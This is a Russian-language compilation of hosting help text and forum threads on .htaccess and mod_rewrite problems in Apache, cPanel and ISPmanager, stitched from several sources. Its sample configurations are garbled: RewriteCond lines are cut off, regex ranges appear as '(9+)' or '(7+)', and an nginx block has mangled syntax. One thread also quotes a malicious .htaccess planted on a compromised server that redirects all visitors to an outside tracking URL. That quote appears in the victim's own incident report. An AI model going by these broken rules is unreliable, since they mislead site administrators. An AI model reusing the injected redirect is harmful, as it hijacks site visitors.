- Проблемы с .htaccess
- У меня нет файла .htaccess, что делать?
- В cPanel не видно файла .htaccess
- Как включить mod rewrite
- Тема: как включить htaccess ?
- как включить htaccess ?
- Ispmanager htaccess не работает
- Ispmanager htaccess не работает
- Не работает .htaccess
- 4 ответа 4
- Всё ещё ищете ответ? Посмотрите другие вопросы с метками .htaccess apache или задайте свой вопрос.
- Похожие
- Подписаться на ленту
Проблемы с .htaccess
Подробнее о файле .htaccess читайте в статье: Что такое .htaccess?
Поддержка файла «.htaccess» есть только на hosting Linux. На Windows хостинге функцию «.htaccess» выполняет файл web.config.
Модуль поддержки «.htaccess» доступен на всех тарифах виртуального хостинга на основе ОС Linux. Если при установке CMS появляется сообщение об отсутствии поддержки «.htaccess» просто проигнорируйте его.
У меня нет файла .htaccess, что делать?
Если вы настраиваете web-сервер Apache, но у вас нет файла .htaccess, создайте его и пропишите нужные директивы.
Чтобы создать .htaccess, войдите в панель управления хостингом по инструкции: Как войти в панель управления хостингом? Расположите файл .htaccess в каталоге сайта с помощью статьи: В какой каталог нужно загружать файлы моего сайта?.
Если вы случайно удалили файл .htaccess, восстановите его через бэкап. Или добавить стандартный файл .htaccess для вашей CMS: Файлы .htaccess для популярных CMS
В cPanel не видно файла .htaccess
Чтобы увидеть скрытые файлы (начинающиеся с точки) в хостинг панели cPanel, необходимо выполнить следующие действия:
Перейдите в раздел Диспетчер файлов:
В правом верхнем углу нажмите на кнопку Параметры:
Установите галочку Показывать скрытые файлы (dotfiles) и сохраните изменения нажав на Save:
Как включить mod rewrite
Модуль «mod_rewrite» присутствует на всех тарифных планах хостинга Linux. Чтобы активировать «mod_rewrite» добавьте в файл .htaccess строку вида:
Источник
Тема: как включить htaccess ?
Опции темы
Поиск по теме
как включить htaccess ?
Доброй ночи! Как включить пользователю htaccess .
До этого у всех все нормально было а тут человек устанавливает Shopcms и говорит включить ему htaccess. Кто что скажет по этому поводу?
Возможно человек имеет ввиду что необходимо включить модуль mod_rewrite?
По-умолчанию он ставится инсталлятором при установке Apache, но вы проверьте на всякий случай.
Проверить самый простой способ включен ли mod_rewrite — создайте на сайте файл .htaccess со строкой RewriteEngine On — если при открытии сайта ошибка 500 — значит не включен.
Options +FollowSymlinks -Indexes -MultiViews
DirectoryIndex index.php
ErrorDocument 404 /404.html
php_value session.use_trans_sid 0
php_value session.use_cookies 1
php_value session.use_only_cookies 1
php_value session.auto_start 0
php_value magic_quotes_gpc 0
php_value register_globals 0
php_value display_errors 0
php_value magic_quotes_runtime 0
php_value allow_url_fopen 1
RewriteEngine On
RewriteBase /
RewriteCond %
RewriteCond %
RewriteCond %
RewriteRule ^(.*)$ 404.html [L]
RewriteRule ^core/(install|temp|smarty|modules|languages|includes|fu nctions|fonts|files|config|classes|cache|backup)/(.*) — [F]
RewriteRule ^data/(.+)\.(tpl\.html|php|php3|php4|php5|phtml|pl|cgi) — [F]
RewriteRule ^install_check\.html$ install.php?check=yes [L]
RewriteRule ^index\.html$ index.php [L]
RewriteRule ^news\.html$ index.php?news=yes [L]
RewriteRule ^price\.html$ index.php?show_price=yes [L]
RewriteRule ^cart\.html$ index.php?shopping_cart=yes [L]
RewriteRule ^wide_search\.html$ index.php?search_with_change_category_ability=yes [L]
RewriteRule ^feedback\.html$ index.php?feedback=yes [L]
RewriteRule ^compare\.html$ index.php?comparison_products=yes [L]
RewriteRule ^page_(9+)\.html$ index.php?show_aux_page=$1 [L]
RewriteRule ^product_(7+)\.html$ index.php?productID=$1 [L]
RewriteRule ^category_(1+)\.html$ index.php?categoryID=$1 [L]
RewriteRule ^category_(4+)_offset_(5+)\.html$ index.php?categoryID=$1&offset=$2 [L]
RewriteRule ^category_(5+)_show_all\.html$ index.php?categoryID=$1&show_all=yes [L]
RewriteRule ^show_news_(8+)\.html$ index.php?fullnews=$1 [L]
# Блок правил для сервера Nginx.
# В случае его использования необходимо вставить нижеуказанные правила в файл nginx.conf в секцию location/ для вашего сайта.
* /core/(install|temp|smarty|modules|languages|includes|fu nctions|fonts|files|config|classes|cache|backup)/(.*) <
return 403;
>
Источник
Ispmanager htaccess не работает
у меня vds панель ISPmanager
залил сайт — он работает
как только заливаю файл .htaccess то сервак сразу выдает ошибку
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, admin@sait.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache/2.2.3 (Debian) PHP/5.2.0-8+etch10 mod_ssl/2.2.3 OpenSSL/0.9.8c Server at sait.com Port 80
делал и htaccess пустым — так такую же ошибку выдает.
причем на другом хостинге работает
подскажите из-за чего такая фигня?
В error_log апача глядите, там написано.
также негрузятся фотки на сайте http://forppc.com/ хотя фотки все есть — из-за каких причин могут не грузиться фотки? с правами на файлы 666 все ок
насчет штаццесс в логах пишет такую ошибку
[Sat Feb 23 18:12:23 2008] [alert] [client 78.47.75.9] /var/www/alukart/data/www/forppc.com/.htaccess: Invalid command ‘RewriteEngine’, perhaps misspelled or defined by a module not included in the server configuration
[Sat Feb 23 18:12:23 2008] [alert] [client 78.47.75.9] /var/www/alukart/data/www/forppc.com/.htaccess: Invalid command ‘RewriteEngine’, perhaps misspelled or defined by a module not included in the server configuration, referer: http://forppc.com/
тоесть неверная комманда. на др серваках все работает.
как ее можно включить в панели?
Это не команда, это модуль apache, его нужно либо раскомментировать в httpd.conf, либо установить.
Телепатов здесь нет, покажите error_log.
Быть может помогут права 755 на папку.
mod_rewrite не установлен или отключен.
Invalid command ‘RewriteEngine’, perhaps misspelled or defined by a module not included in the server configuration. этим все сказано.
Включите поддержку модуля, если не знаете как, то обратитесь в службу поддержки хостинга. Удачи.
Источник
Ispmanager htaccess не работает
Все-таки отпишусь по результатам — вдруг кому интересно будет и пригодится.
На домашнем компе обнаружены следы трояна Win32/Small.CVQ, NOD32 его выловил, но, видать, поздно.
Или просто подобрали пароль от ftp. SSH не пробили. Работал скрипт, прошелся по корням сайтов и по папкам первого уровня по файлам .htaccess. Часть удалил, часть оставил без изменений, а в двух местах заменил файлы на
Deny from all
IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %
RewriteRule .* http://clasquerastmi.staticcling.org/wstat/accepter.php?h=%
#replace_tag
Сайт в правиле уже заблокирован.
Восстановил все с архива, заменил пароль на ftp, оставил доступ к ftp и ssh только для двух своих ip. Проверил комп на вирусы (уже не было).
На серваке смотерть логи /var/log secure и xferlog.
ls, еще раз спасибо за наводку. WebGraf, тоже пасиб )
И гоните детей от своих рабочих машин )
И раз уж развел офф, то это нормально, что на сервак столько много народу ломится с подбором паролей? В день с десяток ip запросов по 50-100 с каждого 🙁
И раз уж развел офф, то это нормально, что на сервак столько много народу ломится с подбором паролей? В день с десяток ip запросов по 50-100 с каждого 🙁
Если вы про ssh то порт можно изменить 🙂
Источник
Не работает .htaccess
Не работает переадресация всех запросов на index.php и выдает ошибку, как я понял, то проблема в том, что апач не учитывает настройки моего файла .htaccess.
Вот настройки апача из файла настройек httpd.conf
Вот содержимое htaccess
Подскажите, в чем проблема?
4 ответа 4
Первым делом нужно проверить обрабатывается ли htaccess. Для этого нужно сохранить его с любым текстом не имеющим смысла. Если получите 500-ю ошибку, то файл обрабатывается.
Далее нужно проверить заголовки сервера, например с помощью https://bertal.ru/ или инструментов разработчика Google Chrome — вкладка Network. Вполне возможно (на хостингах), что в заголовках ответа в качестве сервера вы увидите не Apache, а nginx. Тогда нужно смотреть как настроен nginx. Как правило он может искать запрашиваемые ссылки физически в файловой системе.
В вашей настройке не указано как будет называться AccessFile, нужно добавить «AccessFileName .htaccess» в конфиге apache.
У меня тоже была такая проблема. Но я решил. Нашёл два способа:
- Это решается со стороны хоcтинга. Если они не хотят или не могут, то нужно менять хостинг.
Перед названием контроллера добавить index.php . Например:
Ещё, на всякий случай вот тут содержимое моего файла .htaccess:
Всё ещё ищете ответ? Посмотрите другие вопросы с метками .htaccess apache или задайте свой вопрос.
Похожие
Подписаться на ленту
Для подписки на ленту скопируйте и вставьте эту ссылку в вашу программу для чтения RSS.
дизайн сайта / логотип © 2021 Stack Exchange Inc; материалы пользователей предоставляются на условиях лицензии cc by-sa. rev 2021.10.19.40496
Нажимая «Принять все файлы cookie» вы соглашаетесь, что Stack Exchange может хранить файлы cookie на вашем устройстве и раскрывать информацию в соответствии с нашей Политикой в отношении файлов cookie.
Источник